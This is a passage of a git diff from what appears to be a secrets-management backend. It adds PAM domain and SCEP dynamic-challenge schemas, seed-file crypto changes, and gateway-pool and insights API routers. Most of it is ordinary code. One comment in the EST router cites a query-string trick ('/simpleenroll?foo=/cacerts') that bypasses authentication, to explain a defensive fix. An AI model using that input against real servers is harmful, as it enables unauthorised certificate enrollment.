"@app/lib/zod"; + +import { TImmutableDBKeys } from "./models"; + +export const PamDomainsSchema = z.object({ + id: z.string().uuid(), + projectId: z.string(), + name: z.string(), + domainType: z.string(), + gatewayId: z.string().uuid().nullable().optional(), + encryptedConnectionDetails: zodBuffer, + discoveryFingerprint: z.string().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TPamDomains = z.infer; +export type TPamDomainsInsert = Omit, TImmutableDBKeys>; +export type TPamDomainsUpdate = Partial, TImmutableDBKeys>>; diff --git a/backend/src/db/schemas/pam-resources.ts b/backend/src/db/schemas/pam-resources.ts index 78a7c160272..0e03fcc83fb 100644 --- a/backend/src/db/schemas/pam-resources.ts +++ b/backend/src/db/schemas/pam-resources.ts @@ -20,8 +20,8 @@ export const PamResourcesSchema = z.object({ updatedAt: z.date(), encryptedRotationAccountCredentials: zodBuffer.nullable().optional(), encryptedResourceMetadata: zodBuffer.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional(), discoveryFingerprint: z.string().nullable().optional(), + domainId: z.string().uuid().nullable().optional(), encryptedSessionSummaryConfig: zodBuffer.nullable().optional() }); diff --git a/backend/src/db/schemas/pam-sessions.ts b/backend/src/db/schemas/pam-sessions.ts index f499da367db..a3fc0d4ad42 100644 --- a/backend/src/db/schemas/pam-sessions.ts +++ b/backend/src/db/schemas/pam-sessions.ts @@ -32,7 +32,8 @@ export const PamSessionsSchema = z.object({ resourceId: z.string().uuid().nullable().optional(), encryptedAiInsights: zodBuffer.nullable().optional(), aiInsightsStatus: z.string().nullable().optional(), - aiInsightsError: z.string().nullable().optional() + aiInsightsError: z.string().nullable().optional(), + reason: z.string().nullable().optional() }); export type TPamSessions = z.infer; diff --git a/backend/src/db/schemas/pki-scep-dynamic-challenges.ts b/backend/src/db/schemas/pki-scep-dynamic-challenges.ts new file mode 100644 index 00000000000..cbc005ab2a4 --- /dev/null +++ b/backend/src/db/schemas/pki-scep-dynamic-challenges.ts @@ -0,0 +1,23 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const PkiScepDynamicChallengesSchema = z.object({ + id: z.string().uuid(), + scepConfigId: z.string().uuid(), + hashedChallenge: z.string(), + expiresAt: z.date(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TPkiScepDynamicChallenges = z.infer; +export type TPkiScepDynamicChallengesInsert = Omit, TImmutableDBKeys>; +export type TPkiScepDynamicChallengesUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/pki-scep-enrollment-configs.ts b/backend/src/db/schemas/pki-scep-enrollment-configs.ts index 22dd50fd39c..616b4ee18b9 100644 --- a/backend/src/db/schemas/pki-scep-enrollment-configs.ts +++ b/backend/src/db/schemas/pki-scep-enrollment-configs.ts @@ -14,11 +14,14 @@ export const PkiScepEnrollmentConfigsSchema = z.object({ encryptedRaPrivateKey: zodBuffer, raCertificate: z.string(), raCertExpiresAt: z.date(), - hashedChallengePassword: z.string(), + hashedChallengePassword: z.string().nullable().optional(), includeCaCertInResponse: z.boolean().default(true), allowCertBasedRenewal: z.boolean().default(true), createdAt: z.date(), - updatedAt: z.date() + updatedAt: z.date(), + challengeType: z.string().default("static"), + dynamicChallengeExpiryMinutes: z.number().nullable().optional(), + dynamicChallengeMaxPending: z.number().nullable().optional() }); export type TPkiScepEnrollmentConfigs = z.infer; diff --git a/backend/src/db/schemas/resource-metadata.ts b/backend/src/db/schemas/resource-metadata.ts index 4bb113d1391..c2f0acf01d8 100644 --- a/backend/src/db/schemas/resource-metadata.ts +++ b/backend/src/db/schemas/resource-metadata.ts @@ -25,7 +25,8 @@ export const ResourceMetadataSchema = z.object({ certificateRequestId: z.string().uuid().nullable().optional(), certificateRequestCreatedAt: z.date().nullable().optional(), pamResourceId: z.string().uuid().nullable().optional(), - pamAccountId: z.string().uuid().nullable().optional() + pamAccountId: z.string().uuid().nullable().optional(), + pamDomainId: z.string().uuid().nullable().optional() }); export type TResourceMetadata = z.infer; diff --git a/backend/src/db/schemas/webhooks.ts b/backend/src/db/schemas/webhooks.ts index 60f031ffff3..1d603e1012c 100644 --- a/backend/src/db/schemas/webhooks.ts +++ b/backend/src/db/schemas/webhooks.ts @@ -29,7 +29,8 @@ export const WebhooksSchema = z.object({ urlTag: z.string().nullable().optional(), type: z.string().default("general").nullable().optional(), encryptedPassKey: zodBuffer.nullable().optional(), - encryptedUrl: zodBuffer + encryptedUrl: zodBuffer, + filteredEvents: z.string().array().nullable().optional() }); export type TWebhooks = z.infer; diff --git a/backend/src/db/seeds/1-user.ts b/backend/src/db/seeds/1-user.ts index ec7e4bab9d8..eaed136ab96 100644 --- a/backend/src/db/seeds/1-user.ts +++ b/backend/src/db/seeds/1-user.ts @@ -1,9 +1,9 @@ -import bcrypt from "bcrypt"; import { Knex } from "knex"; import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns"; import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { getHsmConfig, initEnvConfig } from "@app/lib/config/env"; +import { crypto } from "@app/lib/crypto/cryptography"; import { initLogger, logger } from "@app/lib/logger"; import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal"; @@ -38,9 +38,14 @@ export async function seed(knex: Knex): Promise { await initEnvConfig(hsmService, kmsRootConfigDAL, superAdminDAL, logger); await knex(TableName.SuperAdmin).insert([ - // eslint-disable-next-line - // @ts-ignore - { id: "00000000-0000-0000-0000-000000000000", initialized: true, allowSignUp: true } + { + // eslint-disable-next-line + // @ts-ignore + id: "00000000-0000-0000-0000-000000000000", + initialized: true, + allowSignUp: true, + fipsEnabled: process.env.FIPS_ENABLED === "true" + } ]); // Inserts seed entries @@ -65,8 +70,7 @@ export async function seed(knex: Knex): Promise { ]) .returning("*"); - // Hash password for modern login support (POST /api/v3/auth/login) - const hashedPassword = await bcrypt.hash(seedData1.password, 10); + const hashedPassword = await crypto.hashing().createHash(seedData1.password, 10); await knex(TableName.Users).where({ id: user.id }).update({ hashedPassword }); const encKeys = await generateUserSrpKeys(seedData1.password); diff --git a/backend/src/db/seeds/3-project.ts b/backend/src/db/seeds/3-project.ts index e18d774c88e..aef9395582e 100644 --- a/backend/src/db/seeds/3-project.ts +++ b/backend/src/db/seeds/3-project.ts @@ -3,7 +3,7 @@ import { Knex } from "knex"; import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns"; import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { getHsmConfig, initEnvConfig } from "@app/lib/config/env"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; +import { crypto } from "@app/lib/crypto/cryptography"; import { generateUserSrpKeys } from "@app/lib/crypto/srp"; import { initLogger, logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; @@ -22,8 +22,6 @@ import { OrgMembershipStatus, ProjectMembershipRole, ProjectType, - SecretEncryptionAlgo, - SecretKeyEncoding, TableName } from "../schemas"; import { seedData1 } from "../seed-data"; @@ -259,21 +257,15 @@ export async function seed(knex: Knex): Promise { await knex(TableName.SecretFolder).insert(envs.map(({ id }) => ({ name: "root", envId: id, parentId: null }))); // save secret secret blind index - const encKey = process.env.ENCRYPTION_KEY; - if (!encKey) throw new Error("Missing ENCRYPTION_KEY"); const salt = crypto.randomBytes(16).toString("base64"); - const secretBlindIndex = crypto.encryption().symmetric().encrypt({ - plaintext: salt, - key: encKey, - keySize: SymmetricKeySize.Bits128 - }); + const secretBlindIndex = crypto.encryption().symmetric().encryptWithRootEncryptionKey(salt); // insert secret blind index for project await knex(TableName.SecretBlindIndex).insert({ projectId: project.id, encryptedSaltCipherText: secretBlindIndex.ciphertext, saltIV: secretBlindIndex.iv, saltTag: secretBlindIndex.tag, - algorithm: SecretEncryptionAlgo.AES_256_GCM, - keyEncoding: SecretKeyEncoding.UTF8 + algorithm: secretBlindIndex.algorithm, + keyEncoding: secretBlindIndex.encoding }); } diff --git a/backend/src/ee/routes/est/certificate-est-router.ts b/backend/src/ee/routes/est/certificate-est-router.ts index d5876782dbf..ae216f32a97 100644 --- a/backend/src/ee/routes/est/certificate-est-router.ts +++ b/backend/src/ee/routes/est/certificate-est-router.ts @@ -56,9 +56,14 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) = }); // Authenticate EST client using Passphrase - server.addHook("onRequest", async (req, res) => { + // Using preHandler instead of onRequest ensures rate limiting (preValidation) runs first + server.addHook("preHandler", async (req, res) => { const { authorization } = req.headers; - const urlFragments = req.url.split("/"); + + // Strip query string before parsing URL path to prevent bypass attacks + // (e.g., /simpleenroll?foo=/cacerts would otherwise match "cacerts") + const urlPath = req.url.split("?")[0]; + const urlFragments = urlPath.split("/"); // cacerts endpoint should not have any authentication if (urlFragments[urlFragments.length - 1] === "cacerts") { diff --git a/backend/src/ee/routes/scep/pki-scep-router.ts b/backend/src/ee/routes/scep/pki-scep-router.ts index e68b6e6dfe4..f7f27e1f372 100644 --- a/backend/src/ee/routes/scep/pki-scep-router.ts +++ b/backend/src/ee/routes/scep/pki-scep-router.ts @@ -1,7 +1,10 @@ import { z } from "zod"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { BadRequestError } from "@app/lib/errors"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; const MAX_SCEP_MESSAGE_SIZE = 64 * 1024; // 64KB @@ -18,6 +21,7 @@ export const registerPkiScepRouter = async (server: FastifyZodProvider) => { server.addHook("onRequest", async (req) => { if ( req.method === "POST" && + req.url.includes("/pkiclient.exe") && (!req.headers["content-type"] || req.headers["content-type"] === "application/octet-stream") ) { // eslint-disable-next-line no-param-reassign @@ -113,4 +117,45 @@ export const registerPkiScepRouter = async (server: FastifyZodProvider) => { return res.send(response); } }); + + server.route({ + method: "POST", + url: "/:profileId/challenge", + config: { + rateLimit: writeLimit + }, + schema: { + params: z.object({ + profileId: z.string().uuid() + }) + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req, res) => { + const { profileId } = req.params; + + const result = await server.services.pkiScep.generateDynamicChallenge({ + profileId, + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId + }); + + void server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: result.projectId, + event: { + type: EventType.SCEP_DYNAMIC_CHALLENGE_GENERATED, + metadata: { + profileId, + profileSlug: result.profileSlug, + expiresAt: result.expiresAt + } + } + }); + + void res.header("Content-Type", "text/plain"); + return res.send(result.challenge); + } + }); }; diff --git a/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts b/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts index c1e2a74c810..873002eb833 100644 --- a/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts +++ b/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts @@ -592,7 +592,15 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => endpointId: z.string().uuid().trim().min(1) }), body: z.object({ - redirect_uris: z.array(z.string()), + redirect_uris: z.array( + z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ) + ), token_endpoint_auth_method: z.string(), grant_types: z.array(z.string()), response_types: z.array(z.string()), @@ -603,7 +611,15 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => response: { 200: z.object({ client_id: z.string(), - redirect_uris: z.array(z.string()), + redirect_uris: z.array( + z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ) + ), client_name: z.string(), client_uri: z.string().optional(), grant_types: z.array(z.string()), @@ -687,7 +703,13 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => client_id: z.string(), code_challenge: z.string(), code_challenge_method: z.enum(["S256"]), - redirect_uri: z.string(), + redirect_uri: z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ), resource: z.string().optional(), expireIn: z.string().refine((val) => ms(val) > 0, "Max TTL must be a positive number") }), diff --git a/backend/src/ee/routes/v1/gateway-pool-router.ts b/backend/src/ee/routes/v1/gateway-pool-router.ts new file mode 100644 index 00000000000..2995f29fc38 --- /dev/null +++ b/backend/src/ee/routes/v1/gateway-pool-router.ts @@ -0,0 +1,314 @@ +import z from "zod"; + +import { GatewayPoolMembershipsSchema, GatewayPoolsSchema, GatewaysV2Schema } from "@app/db/schemas"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { slugSchema } from "@app/server/lib/schemas"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const SanitizedGatewayPoolSchema = GatewayPoolsSchema.pick({ + id: true, + orgId: true, + name: true, + createdAt: true, + updatedAt: true +}); + +const SanitizedPoolMemberSchema = GatewaysV2Schema.pick({ + id: true, + name: true, + heartbeat: true, + lastHealthCheckStatus: true +}); + +export const registerGatewayPoolRouter = async (server: FastifyZodProvider) => { + // Create a gateway pool + server.route({ + method: "POST", + url: "/", + schema: { + operationId: "createGatewayPool", + body: z.object({ + name: slugSchema({ min: 1, max: 32, field: "name" }).describe("Name for the gateway pool") + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.createGatewayPool({ + name: req.body.name, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_CREATE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // List gateway pools + server.route({ + method: "GET", + url: "/", + schema: { + operationId: "listGatewayPools", + response: { + 200: z.array( + SanitizedGatewayPoolSchema.extend({ + memberCount: z.number(), + healthyMemberCount: z.number(), + memberGatewayIds: z.array(z.string().uuid()), + connectedResourcesCount: z.number() + }) + ) + } + }, + config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.listGatewayPools(req.permission); + } + }); + + // Get gateway pool by ID + server.route({ + method: "GET", + url: "/:poolId", + schema: { + operationId: "getGatewayPoolById", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: SanitizedGatewayPoolSchema.extend({ + gateways: z.array(SanitizedPoolMemberSchema) + }) + } + }, + config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.getGatewayPoolById({ + poolId: req.params.poolId, + ...req.permission + }); + } + }); + + // Update gateway pool + server.route({ + method: "PATCH", + url: "/:poolId", + schema: { + operationId: "updateGatewayPool", + params: z.object({ + poolId: z.string().uuid() + }), + body: z.object({ + name: slugSchema({ min: 1, max: 32, field: "name" }).optional().describe("New name for the pool") + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.updateGatewayPool({ + poolId: req.params.poolId, + name: req.body.name, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_UPDATE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // Delete gateway pool + server.route({ + method: "DELETE", + url: "/:poolId", + schema: { + operationId: "deleteGatewayPool", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.deleteGatewayPool({ + poolId: req.params.poolId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_DELETE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // Add gateway to pool + server.route({ + method: "POST", + url: "/:poolId/memberships", + schema: { + operationId: "addGatewayToPool", + params: z.object({ + poolId: z.string().uuid() + }), + body: z.object({ + gatewayId: z.string().uuid().describe("ID of the gateway to add to the pool") + }), + response: { + 200: GatewayPoolMembershipsSchema.pick({ + id: true, + gatewayPoolId: true, + gatewayId: true, + createdAt: true + }) + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { membership, poolName, gatewayName } = await server.services.gatewayPool.addGatewayToPool({ + poolId: req.params.poolId, + gatewayId: req.body.gatewayId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_ADD_MEMBER, + metadata: { + poolId: req.params.poolId, + poolName, + gatewayId: req.body.gatewayId, + gatewayName + } + } + }); + + return membership; + } + }); + + // Remove gateway from pool + server.route({ + method: "DELETE", + url: "/:poolId/memberships/:gatewayId", + schema: { + operationId: "removeGatewayFromPool", + params: z.object({ + poolId: z.string().uuid(), + gatewayId: z.string().uuid() + }), + response: { + 200: GatewayPoolMembershipsSchema.pick({ + id: true, + gatewayPoolId: true, + gatewayId: true, + createdAt: true + }) + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { membership, poolName, gatewayName } = await server.services.gatewayPool.removeGatewayFromPool({ + poolId: req.params.poolId, + gatewayId: req.params.gatewayId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_REMOVE_MEMBER, + metadata: { + poolId: req.params.poolId, + poolName, + gatewayId: req.params.gatewayId, + gatewayName + } + } + }); + + return membership; + } + }); + + // Get connected resources for a pool + server.route({ + method: "GET", + url: "/:poolId/resources", + schema: { + operationId: "getGatewayPoolConnectedResources", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: z.object({ + kubernetesAuths: z.array( + z.object({ + id: z.string(), + identityId: z.string(), + identityName: z.string().nullable() + }) + ) + }) + } + }, + config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.getConnectedResources({ + poolId: req.params.poolId, + ...req.permission + }); + } + }); +}; diff --git a/backend/src/ee/routes/v1/index.ts b/backend/src/ee/routes/v1/index.ts index c8b353f6eab..7ef91cddffb 100644 --- a/backend/src/ee/routes/v1/index.ts +++ b/backend/src/ee/routes/v1/index.ts @@ -17,11 +17,13 @@ import { registerDynamicSecretRouter } from "./dynamic-secret-router"; import { registerEmailDomainRouter } from "./email-domain-router"; import { registerExternalKmsRouter } from "./external-kms-router"; import { EXTERNAL_KMS_REGISTER_ROUTER_MAP } from "./external-kms-routers"; +import { registerGatewayPoolRouter } from "./gateway-pool-router"; import { registerGatewayRouter } from "./gateway-router"; import { registerGithubOrgSyncRouter } from "./github-org-sync-router"; import { registerGroupRouter } from "./group-router"; import { registerIdentityProjectAdditionalPrivilegeRouter } from "./identity-project-additional-privilege-router"; import { registerIdentityTemplateRouter } from "./identity-template-router"; +import { registerInsightsRouter } from "./insights-router"; import { registerKmipRouter } from "./kmip-router"; import { registerKmipSpecRouter } from "./kmip-spec-router"; import { registerLdapRouter } from "./ldap-router"; @@ -33,6 +35,11 @@ import { PAM_ACCOUNT_REGISTER_ROUTER_MAP } from "./pam-account-routers"; import { registerPamAccountRouter } from "./pam-account-routers/pam-account-router"; import { PAM_DISCOVERY_REGISTER_ROUTER_MAP } from "./pam-discovery-routers"; import { registerPamDiscoveryRouter } from "./pam-discovery-routers/pam-discovery-router"; +import { + PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP, + PAM_DOMAIN_REGISTER_ROUTER_MAP, + registerPamDomainRouter +} from "./pam-domain-routers"; import { registerPamFolderRouter } from "./pam-folder-router"; import { PAM_RESOURCE_REGISTER_ROUTER_MAP } from "./pam-resource-routers"; import { registerPamResourceRotationRulesRouter } from "./pam-resource-routers/pam-resource-rotation-rules-router"; @@ -49,8 +56,6 @@ import { registerRelayRouter } from "./relay-router"; import { registerSamlRouter } from "./saml-router"; import { registerScimRouter } from "./scim-router"; import { registerSecretApprovalRequestRouter } from "./secret-approval-request-router"; -import { registerSecretRotationProviderRouter } from "./secret-rotation-provider-router"; -import { registerSecretRotationRouter } from "./secret-rotation-router"; import { registerSecretRouter } from "./secret-router"; import { registerSecretScanningRouter } from "./secret-scanning-router"; import { registerSecretVersionRouter } from "./secret-version-router"; @@ -96,9 +101,6 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await server.register(registerSecretApprovalRequestRouter, { prefix: "/secret-approval-requests" }); - await server.register(registerSecretRotationProviderRouter, { - prefix: "/secret-rotation-providers" - }); await server.register(registerAccessApprovalPolicyRouter, { prefix: "/access-approvals/policies" }); await server.register(registerAccessApprovalRequestRouter, { prefix: "/access-approvals/requests" }); @@ -114,9 +116,12 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { ); await server.register(registerGatewayRouter, { prefix: "/gateways" }); + await server.register(registerGatewayPoolRouter, { prefix: "/gateway-pools" }); await server.register(registerRelayRouter, { prefix: "/relays" }); await server.register(registerGithubOrgSyncRouter, { prefix: "/github-org-sync-config" }); + await server.register(registerInsightsRouter, { prefix: "/insights" }); + await server.register( async (pkiRouter) => { await pkiRouter.register(registerCaCrlRouter, { prefix: "/crl" }); @@ -149,7 +154,6 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await server.register(registerScimRouter, { prefix: "/scim" }); await server.register(registerLdapRouter, { prefix: "/ldap" }); await server.register(registerSecretScanningRouter, { prefix: "/secret-scanning" }); - await server.register(registerSecretRotationRouter, { prefix: "/secret-rotations" }); await server.register(registerSecretRouter, { prefix: "/secrets" }); await server.register(registerSecretVersionRouter, { prefix: "/secret" }); await server.register(registerGroupRouter, { prefix: "/groups" }); @@ -206,6 +210,19 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await pamRouter.register(registerPamFolderRouter, { prefix: "/folders" }); await pamRouter.register(registerPamSessionRouter, { prefix: "/sessions" }); await pamRouter.register(registerPamAccountPolicyRouter, { prefix: "/account-policies" }); + await pamRouter.register( + async (pamDomainRouter) => { + await pamDomainRouter.register(registerPamDomainRouter); + + // Domain-type-specific endpoints + await Promise.all( + Object.entries(PAM_DOMAIN_REGISTER_ROUTER_MAP).map(([provider, router]) => + pamDomainRouter.register(router, { prefix: `/${provider}` }) + ) + ); + }, + { prefix: "/domains" } + ); await pamRouter.register( async (pamDiscoveryRouter) => { await pamDiscoveryRouter.register(registerPamDiscoveryRouter); @@ -224,12 +241,19 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { async (pamAccountRouter) => { await pamAccountRouter.register(registerPamAccountRouter); - // Provider-specific endpoints + // Resource-type-specific account endpoints await Promise.all( Object.entries(PAM_ACCOUNT_REGISTER_ROUTER_MAP).map(([provider, router]) => pamAccountRouter.register(router, { prefix: `/${provider}` }) ) ); + + // Domain-type-specific account endpoints + await Promise.all( + Object.entries(PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP).map(([provider, router]) => + pamAccountRouter.register(router, { prefix: `/${provider}` }) + ) + ); }, { prefix: "/accounts" } ); diff --git a/backend/src/ee/routes/v1/insights-router.ts b/backend/src/ee/routes/v1/insights-router.ts new file mode 100644 index 00000000000..7c65e229fdd --- /dev/null +++ b/backend/src/ee/routes/v1/insights-router.ts @@ -0,0 +1,238 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +export const registerInsightsRouter = async (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/secrets/calendar", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsCalendar", + description: "Get secret rotation and reminder events for a calendar month view", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + month: z.coerce.number().min(1).max(12), + year: z.coerce.number().min(2000).max(2100) + }), + response: { + 200: z.object({ + rotations: z.array( + z.object({ + id: z.string(), + name: z.string(), + type: z.string(), + nextRotationAt: z.date().nullable(), + environment: z.string(), + secretPath: z.string(), + secretKeys: z.string().array(), + rotationInterval: z.number(), + rotationStatus: z.string().nullable(), + isAutoRotationEnabled: z.boolean() + }) + ), + reminders: z.array( + z.object({ + id: z.string(), + secretId: z.string().nullable(), + secretKey: z.string(), + nextReminderDate: z.date(), + message: z.string().nullable().optional(), + environment: z.string(), + secretPath: z.string(), + repeatDays: z.number().nullable().optional() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, month, year } = req.query; + const result = await server.services.insights.getCalendar({ projectId, month, year }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR, metadata: { projectId, month, year } }, + ...req.auditLogInfo + }); + return result; + } + }); + + server.route({ + method: "GET", + url: "/secrets/access-volume", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsAccessVolume", + description: "Get secret access volume aggregated by day and actor for the past week", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + days: z.array( + z.object({ + date: z.string(), + total: z.number(), + actors: z.array(z.object({ name: z.string(), type: z.string(), count: z.number() })) + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId } = req.query; + const result = await server.services.insights.getAccessVolume({ projectId }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME, metadata: { projectId } }, + ...req.auditLogInfo + }); + return result; + } + }); + + // server.route({ + // method: "GET", + // url: "/secrets/access-locations", + // config: { rateLimit: readLimit }, + // schema: { + // operationId: "getInsightsAccessLocations", + // description: "Get geographic locations of secret access based on audit log IP addresses", + // security: [{ bearerAuth: [] }], + // querystring: z.object({ + // projectId: z.string().trim(), + // days: z.coerce.number().min(1).max(90).default(30) + // }), + // response: { + // 200: z.object({ + // locations: z.array( + // z.object({ lat: z.number(), lng: z.number(), city: z.string(), country: z.string(), count: z.number() }) + // ) + // }) + // } + // }, + // onRequest: verifyAuth([AuthMode.JWT]), + // handler: async (req) => { + // const { projectId, days } = req.query; + // const result = await server.services.insights.getAccessLocations({ projectId, days }, req.permission); + // await server.services.auditLog.createAuditLog({ + // projectId, + // event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS, metadata: { projectId, days } }, + // ...req.auditLogInfo + // }); + // return result; + // } + // }); + + server.route({ + method: "GET", + url: "/auth/method-distribution", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsAuthMethodDistribution", + description: "Get distribution of authentication methods from secret access audit logs", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + days: z.coerce.number().min(1).max(90).default(30) + }), + response: { + 200: z.object({ + methods: z.array(z.object({ method: z.string(), count: z.number() })) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, days } = req.query; + const result = await server.services.insights.getAuthMethodDistribution({ projectId, days }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_AUTH_METHODS, metadata: { projectId, days } }, + ...req.auditLogInfo + }); + return result; + } + }); + + server.route({ + method: "GET", + url: "/secrets/summary", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsSummary", + description: + "Get summary stats for the insights dashboard: upcoming rotations, upcoming reminders, and stale secrets", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + staleSecretsOffset: z.coerce.number().min(0).max(10000).default(0), + staleSecretsLimit: z.coerce.number().min(1).max(100).default(50) + }), + response: { + 200: z.object({ + upcomingRotations: z.array( + z.object({ + name: z.string(), + environment: z.string(), + secretPath: z.string(), + nextRotationAt: z.date().nullable(), + rotationStatus: z.string().nullable() + }) + ), + failedRotations: z.array( + z.object({ + name: z.string(), + environment: z.string(), + secretPath: z.string(), + nextRotationAt: z.date().nullable(), + rotationStatus: z.string().nullable() + }) + ), + upcomingReminders: z.array( + z.object({ + secretKey: z.string(), + environment: z.string(), + secretPath: z.string(), + nextReminderDate: z.date() + }) + ), + overdueReminders: z.array( + z.object({ + secretKey: z.string(), + environment: z.string(), + secretPath: z.string(), + nextReminderDate: z.date() + }) + ), + staleSecrets: z.array( + z.object({ key: z.string(), environment: z.string(), secretPath: z.string(), 